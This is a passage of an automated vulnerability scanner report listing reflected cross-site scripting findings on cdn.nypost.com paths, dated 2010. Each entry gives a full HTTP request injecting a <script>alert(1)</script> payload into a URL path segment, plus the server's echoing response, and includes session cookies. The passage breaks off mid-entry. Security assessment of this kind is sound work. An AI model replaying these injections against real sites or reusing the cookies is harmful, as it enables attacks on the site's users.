1.46. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ca7f3<script>alert(1)</script>5e24e6fb15b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocksca7f3<script>alert(1)</script>5e24e6fb15b/shareit/shareit.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:45 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocksca7f3<script>alert(1)</script>5e24e6fb15b/shareit/shareit.js</p>
...[SNIP]...

1.47. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3b2ef<script>alert(1)</script>3065249c9f4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/shareit3b2ef<script>alert(1)</script>3065249c9f4/shareit.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:53 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/shareit3b2ef<script>alert(1)</script>3065249c9f4/shareit.js</p>
...[SNIP]...

1.48. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 5d9c8<script>alert(1)</script>21b824c49c9 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js5d9c8<script>alert(1)</script>21b824c49c9 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:08 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js5d9c8<script>alert(1)</script>21b824c49c9</p>
...[SNIP]...

1.49. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb649<script>alert(1)</script>11919a8a872 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigeb649<script>alert(1)</script>11919a8a872/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 721
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigeb649<script>alert(1)</script>11919a8a872/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js</p>
...[SNIP]...

1.50. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76d62<script>alert(1)</script>f7ccbce8073 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal76d62<script>alert(1)</script>f7ccbce8073/nypost/blocks/sticky_notes/sticky_notes.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 721
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal76d62<script>alert(1)</script>f7ccbce8073/nypost/blocks/sticky_notes/sticky_notes.js</p>
...[SNIP]...

1.51. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 241af<script>alert(1)</script>bb94293df62 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost241af<script>alert(1)</script>bb94293df62/blocks/sticky_notes/sticky_notes.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 721
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:27 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost241af<script>alert(1)</script>bb94293df62/blocks/sticky_notes/sticky_notes.js</p>
...[SNIP]...

1.52. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1802e<script>alert(1)</script>ade49ab0bd9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks1802e<script>alert(1)</script>ade49ab0bd9/sticky_notes/sticky_notes.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 721
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks1802e<script>alert(1)</script>ade49ab0bd9/sticky_notes/sticky_notes.js</p>
...[SNIP]...

1.53. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8c819<script>alert(1)</script>4ceecdf86bb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/sticky_notes8c819<script>alert(1)</script>4ceecdf86bb/sticky_notes.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 721
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:43 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/sticky_notes8c819<script>alert(1)</script>4ceecdf86bb/sticky_notes.js</p>
...[SNIP]...

1.54. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 8deb2<script>alert(1)</script>68d888ca74 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js8deb2<script>alert(1)</script>68d888ca74 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 720
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:51 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js8deb2<script>alert(1)</script>68d888ca74</p>
...[SNIP]...

1.55. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d17ee<script>alert(1)</script>4ace09c91e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigd17ee<script>alert(1)</script>4ace09c91e1/WebPortal/nypost/blocks/top_story/top_story_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigd17ee<script>alert(1)</script>4ace09c91e1/WebPortal/nypost/blocks/top_story/top_story_functions.js</p>
...[SNIP]...

1.56. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 54b48<script>alert(1)</script>4e5e68869c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal54b48<script>alert(1)</script>4e5e68869c0/nypost/blocks/top_story/top_story_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:43 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal54b48<script>alert(1)</script>4e5e68869c0/nypost/blocks/top_story/top_story_functions.js</p>
...[SNIP]...

1.57. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 75cd3<script>alert(1)</script>9fd373f58b8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost75cd3<script>alert(1)</script>9fd373f58b8/blocks/top_story/top_story_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:51 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost75cd3<script>alert(1)</script>9fd373f58b8/blocks/top_story/top_story_functions.js</p>
...[SNIP]...

1.58. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1695f<script>alert(1)</script>1bcf5332e79 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks1695f<script>alert(1)</script>1bcf5332e79/top_story/top_story_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
